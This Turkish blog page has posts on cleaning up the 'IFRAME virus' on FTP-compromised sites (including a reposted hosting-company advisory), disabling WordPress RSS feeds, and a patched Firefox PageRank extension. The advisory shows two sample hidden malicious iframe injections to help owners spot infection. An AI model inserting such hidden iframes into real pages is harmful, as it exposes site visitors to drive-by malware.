Son zamanlarda birçok siteye tebelleş olan IFRAME virüsü, bu sitelerin Google arama sonuçlarında zararlı site olarak nitelendirilmesine neden oluyor. Eğer siz veya sitenizin bulunduğu sunucudaki site sahiplerinden herhangi biri ücretli FTP programlarının crack edilmiş sürümlerini kullanıyorsa sitelerinize IFRAME atılması, farklı sitelere yönlendirmek/popup açtırmak vs. gibi amaçlar için JS kodlarının eklenmesi kaçınılmaz bir hal alıyor.

Son IFRAME kabusu pepsi virüsü, ekolay ve turkticaret’in yeni projesi adhood’a da bulaşmıştı yanlış hatırlamıyorsam.

Eğer bu IFRAME virüsü sitelerinizden birine veya birkaçına bulaşmış ise kurtuluş için yapmanız gereken birkaç adım var:
1. Bilgisayarınızın temiz olduğuna emin olun.
2. Sunucunuza bir virüs taraması yaptırıp temizleyin/temizletin.
3. Sunucuda bulunan sitelerin FTP şifrelerini değiştirin.
4. Crack edilmiş FTP programları kullanmayın.
5. Sitenizin ana ve alt dizinlerini; dosyalarınıza erişime olanak verebilecek yabancı dosya atılmış olabileceği ihtimalini göz önünde bulundurarak tarayıp şüphelendiğiniz dosyaları inceleyin/inceletin.

Bu 5 adımdan herhangi birini atladığınız takdirde yaptığınız temizlik ve çabalar pek bir anlam ifade etmeyecek ve virüs sitelerinize tekrar bulaşacaktır. O nedenle adımların herhangi birini atlamadan uygulamalısınız.

Konu ile ilgili olarak biraz önce Markum’dan bir bilgilendirme maili aldım. Her ne kadar kendileri ile bir ticari bağım olmasa da yaptıkları bu çalışmanın takdire şayan olduğunu belirtmeden geçemeyeceğim. Nitekim konuyu epey derinlemesine irdeleyip güzel bir doküman hazırlamışlar. Bu dokümanı, kendilerine teşekkürlerimle birlikte yazımın ekinde yayınlıyorum…

Web sitelerini tehdit eden IFRAME Virüsü hakkında önemli duyuru!

Bir süredir yaygınlaşmaya başlayan ve pek çok web sitesinin olumsuz etkilendiği IFRAME Virüsü hakkında sizi bilgilendirmek istiyoruz.

IFRAME Virüsü nedir?

Virüslü bilgisayarlardan FTP girişi yapılan sitelerin index, default ve/veya tüm dosyalara zararlı bir IFRAME kodu yerleştirir. Virüs, sitenize giren kullanıcıların bilgisayarlarına virüs bulaştırmayı amaçlamaktadır.

Zararlı IFRAME Virüsü sitelere genellikle FTP üzerinden bulaşmaktadır.

Nasıl bulaşır :

1. Saldırgan öncelikle güncel antivirus yazılımları ile korunmayan bilgisayarınıza bir virus bulaştırır.
2. Bilgisayarınıza Bulaştırılan virüsun amacı bilgisayarınızdaki FTP Programında şifrenin saklandığı dosyayı ve/veya ftp şifrenizi çalmaktır . FTP bilgileri çalındıktan sonra, saldırgan dilediği zaman ftp girişi yapıp, sitenizin index.*, default.* veya tüm dosyalarınızın html taglarının arasına (genellikle sayfanın sonuna) iftame veya script tagı yerleştirir.

IFRAME tagı sayfanızın html tagları arasında gizlenir. Sayfanızı ziyaret eden kullanıcılara virus bulaştırmayı amaçlamaktadır.

IFRAME Virüsü sitenizdeki php, asp veya asp.net kod açıklarından da bulaşabilir. Sitenizdeki dosya ve klasörlerin yazma izinlerinin açık olmasını kullanarak dosyalarınıza bulaşabilir.

IFRAME kod örnekleri:

<IFRAME src='https://siteadresi/index.php' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></IFRAME>

echo "<IFRAME src=\"http://siteadresi\123" width=1 height=1 style=\"visibility:hidden;position:absolute\"></IFRAME>";

Korunmak için yapmanız gerekenler:

1. FTP şifrenizi değiştiriniz.
2. Bilgisayarınızda güncel bir antivirüs yazılımı kullanınız.
3. FTP şifrenizi otomatik girişe ayarlamayın veya FTP girişlerinden sonra şifrenizi değiştiriniz.
4. IFRAME Virüsü sitenizdeki php, asp veya asp.net kod açıklarından bulaşmış olabilir. Bundan korunmak için kontrol panelinizden dosyalarınızın yazma izinlerini kaldırınız, sadece gerekli dosya veya klasörlerinize yazma izni veriniz. Linux sunucularımızdan hizmet alıyorsanız FTP programınızdan özellikle index.* ve default.* dosya izinlerini 444 (read/okuma) olarak ayarlayınız.

Sitelerinizi kontrol ediniz:

Sitenizdeki index.*, default.* dosyalarını bilgisayarınıza indirip html kodlarını gözden geçiriniz. Index.* ve/veya default.* dosyalarınız temiz ise virüs bulaşmamış demektir. Virüs öncelikle bu dosyalara bulaşır. Ancak yine de diğer doslarınızın güncellenme tarihlerini gözden geçiriniz.

Zararlı kod bulaşmış dosyalarınızı temizleyiniz.

IFRAME Virüsü bulaşan siteler Google arama motoru ve Firefox tarayıcısı tarafından saldırgan site olarak sınıflandırılır. Bu sitelere giriş izni verilmez.

Siteniz Google’da saldırgan site olarak listeleniyorsa:

IFRAME Virüsü bulunan site google arama sonuçlarında saldırgan site olarak gösterilir. Bunu düzeltmek için şunları yapabilirsiniz:

1. http://www.google.com/webmasters/tools/ adresine giriş yapınız.
2. Gmail hesabınız veya yeni bir hesap ile giriş yapınız.
3. Sitenizi ekleyerek doğrulayınız.
4. Sitenizi doğruladıktan sonra, kötü amaçlı yazılım uyarısına tıklayarak, zararlı kodların bulaştığı sayfaları görün ve sayfalarınızdan zararlı kodları temizleyin.
5. Sol menüden “Siteyi tekrar değerlendirme” seçeneğine tıklayın …
6. Sitenizde bulunan zararlı kodları kaldırdığınızı ve tekrar değerlendirmelerini rica ediniz.
7. Siteniz birkaç gün içinde saldırgan site olmaktan çıkarılacaktır !

IFRAME Virüsü hakkında bilgi için:
http://www.google.com.tr/search?sourceid=navclient&aq=8&oq=IFRAME+&hl=tr&ie=UTF-8&rlz=1T4GGLL_trTR333TR333&q=IFRAME+vir%c3%bcs%c3%bc

Saygılarımızla,
Markum.net Ekibi

Özgün ve güncel içerik sağlamak kadar sağlanan bu içerikleri korumak, günümüzde site sahiplerinin en büyük sorunlarından biri haline geldi. Birçok site sahibi özene – bezene hazırladığı içerikleri yayınladıktan sonra bir de bu içerikleri koruma derdine düşüyor. Bazen o kadar oluyor ki; gerek manual olarak, gerekse hazırlanan yazılımlar (botlar) ile başka sitelerden içerik araklayanlar, arama motorlarında orijinal içerik sahiplerinden daha üst sıralarda çıkabiliyor.

‘İçerik korumak, orijinal içeriklerin yayınlandığı sitelerin daha üst sıralarda çıkması’ gibi konular SEO (Arama Motoru Optimizasyonu) konusunun da ilgi alanına girdiği, sonuçlar farklı yöntemlerle (Black Hat SEO Technics – Siyah Şapka SEO Teknikleri vs.) manipüle edilebileceği için ve çok geniş mevzular olduğundan bu yazıda bu konulara girmek istemiyorum. Gerekli vakti bulabilirsem ilerleyen zaman içerisinde bu konularla ilgili bir yazı hazırlamayı düşünüyorum.

Bu yazıda, WordPress kullanıcılarının içeriklerini RSS beslemesi yoluyla çalan siteleri engellemek için sitemizin RSS beslemelerini nasıl devre dışı bırakabileceğimizi anlatacağım.

Yine her zaman olduğu gibi bu işlemin de birden çok yöntemi var. Bu yöntemlerden birincisi; temamızın functions.php dosyasına ekleyeceğimiz bir kod vasıtasıyla RSS beslemelerini kapatmak. Aşağıdaki kodu functions.php dosyanıza eklediğinizde RSS beslemelerinize ulaşmak istendiğinde “UYARI: Bazı nedenlerden ötürü RSS paylaşımı yapmıyoruz. İçeriklerimize ulaşmak için lütfen sitemizi ziyaret edin.” şeklinde bir uyarı çıkacaktır. Kodda yer alan uyarı metnini istediğiniz gibi düzenleyebilirsiniz.

/**
 * WordPress RSS beslemelerini fonksiyon ile devre dışı bırakmak
 * https://tercan.net/
**/
function disable_our_feeds() {
wp_die( __('<strong>UYARI:</strong> Bazı nedenlerden ötürü RSS paylaşımı yapmıyoruz. İçeriklerimize ulaşmak için lütfen  <a href="'. get_bloginfo('url') .'">sitemizi</a> ziyaret edin.') );
}

add_action('do_feed', 'disable_our_feeds', 1);
add_action('do_feed_rdf', 'disable_our_feeds', 1);
add_action('do_feed_rss', 'disable_our_feeds', 1);
add_action('do_feed_rss2', 'disable_our_feeds', 1);
add_action('do_feed_atom', 'disable_our_feeds', 1);

İkinci yöntem olarak RSS beslemelerimizi; bir .htaccess dosyası oluşturarak veya var olan .htaccess dosyamıza yapacağımız küçük bir ekleme ile kapatabiliriz. Eğer sitenizde kalıcı bağlantılarınız aktifse zaten .htaccess dosyası kullanıyorsunuz demektir. Yapmanız gereken; bu .htaccess dosyasına tek satırlık bir kod eklemek:

/**
 * WordPress RSS beslemelerini .htaccess ile devre dışı bırakmak
 * https://tercan.net/
**/
RewriteRule feed(.*) https://tercan.net/ [L]

Eğer kalıcı bağlantılarınız aktif değilse bir .htaccess dosyası oluşturup aşağıdaki kodu bu dosyaya yapıştırın.

/**
 * WordPress RSS beslemelerini .htaccess ile devre dışı bırakmak
 * https://tercan.net/
**/
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule feed(.*) https://tercan.net/ [L]
</IfModule>

Her iki şekilde de kodun https://tercan.net/ bölümüne kendi site adresinizi yazmalısınız ki beslemelerinize erişmeye çalışanlar sitenizin anasayfasına yönlensin. Bu bölüm için, özel sayfa oluşturup RSS beslemelerinize erişmek isteyenlerin o sayfaya yönlenmesini veya feedburner gibi servisler kullanıyorsanız bu servislerin adreslerini de yazabilirsiniz.

RSS beslemelerimizi kapatmanın bir diğer yolu da WordPress’in olmazsa olmazlarından olan eklenti çözümüne başvurmaktır. Bu işi yapmamızı sağlayacak olan eklenti Disable RSS isimli eklentidir. Eklentiyi; http://wordpress.org/extend/plugins/disable-rss/ adresinden temin edip standart eklenti kurma prosedürümüzü uygulayarak kuruyor ve aktif ediyoruz.

RSS beslemesini kapatma yönteminin, içeriklerimizin çalınmasına tam olarak engel olamayacağını bilmenizi isterim. Ama içeriklerimizin eklediğimiz anda güncellenen RSS beslemelerinden çalınması, kopyacı sitelerin indekslenme hızları bizimkinden yüksekse bizi kopyacı duruma düşürebilecektir. RSS beslemesini kapatmak; bu tür durumlara karşı basit bir önlem olarak düşünülebilir.

Popüler internet tarayıcısı Firefox, son sümü 3.5’i bildiğimiz gibi geçtiğimiz günlerde yayınladı. Ara versiyonlarda sorun olmamasına rağmen büyük çaplı versiyon geçişlerinde eklenti uyumsuzlukları yaşandığı için Firefox’u yükseltmeye pek gönüllü değildim. Sürekli kullandığım ve elim-ayağım diyebileceğim eklentilerden birinin veya birkaçının çalışmaması durumunda sıkıntı çekecektim.

Bu tür kaygılar içinde birkaç gün güncelleme yapmadım. Ancak daha fazla dayanamayıp Firefox’u 3.5 versiyonuna yükselttiğimde aslında korkulacak bir durumun olmadığı gördüm. Birkaç eklenti haricinde diğer eklentiler sorunsuz çalışıyordu.

Çalışmayan eklentilerin içinde bir tanesi hariç diğerleri önemsiz şeylerdi ve geliştiricilerin keyifleri eklentilerin uyumlu versiyonlarını çıkartana kadar bekleyebilirdi. Ancak SearchStatus eklentisinin çalışmaması daha doğrusu çalışıyor gibi durup da hem PageRank, hem de Alexa değerlerini göstermemesi açıkçası canımı biraz sıkmadı değil. Zira dolaştığım sitelerin Google PageRank değerini görmek web alışkanlıklarımın arasına girmişti.

Hemen alternatif eklentiler için ufak bir araştırma yaptım ve Stephane Queraud tarafından geliştirilen Google Pagerank Status eklentisini buldum. Fakat bu eklentinin geliştirilmesine epey bir zaman ara verilmişti ve  Firefox Eklenti Dizininde de eklentinin Firefox 3.5 sürümü ile uyumsuz olduğu yazılıydı.

Birkaç tane daha başarısız araştırma ve eklenti girişimi yaptıktan sonra ellerim boş bir halde yine Google Pagerank Status’a geri döndüm. Eklentiyi indirip yaptığım birkaç ufak değişiklikle tarayıcı uyumsuzluğunu giderip gideremeyeceğimi merak edip şansımı denedim. Eklentiyi yükleyip tarayıcımı yeniden başlatınca eklentinin sorunsuz çalıştığına şahit olup sevindim.

İçinizde SearchStatus mağduru olan varsa ziyaret ettiğiniz sitenin Google PageRank değerini durum çubuğunda gösteren alternatif eklenti Google Pagerank Status’u deneyebilir.

Eklentiyi bilgisayarınıza kaydedip sonra kurmak istiyorsanız aşağıdaki bağlantıyı kullanabilirsiniz. Dosyayı bilgisayarınıza kaydettikten sonra isterseniz Firefox üzerine sürükleyerek, isterseniz de Dosya – Dosya Aç (Ctrl + O) adımlarını takip edip kaydettiğiniz dosyayı seçerek yükleyebilirsiniz.

  Google Pagerank Status (37,8 KiB)

Direkt kurulum yapmak için ise aşağıdaki bağlantıya tıklayıp birkaç saniye bekledikten sonra Şimdi kur butonuna basın.

  Google Pagerank Status direkt kurulum (37,8 KiB)

Firefox 3.5 için PageRank eklentisi

NOT: Siz de kendi sitenizden bu tür kurulum dosyaları paylaşıyor ve Firefox’un eklentiyi varsayılan işlem olarak yüklemesini istiyorsanız .htaccess dosyanıza şu kodu eklemeniz yeterli olacaktır.

AddType application/x-xpinstall .xpi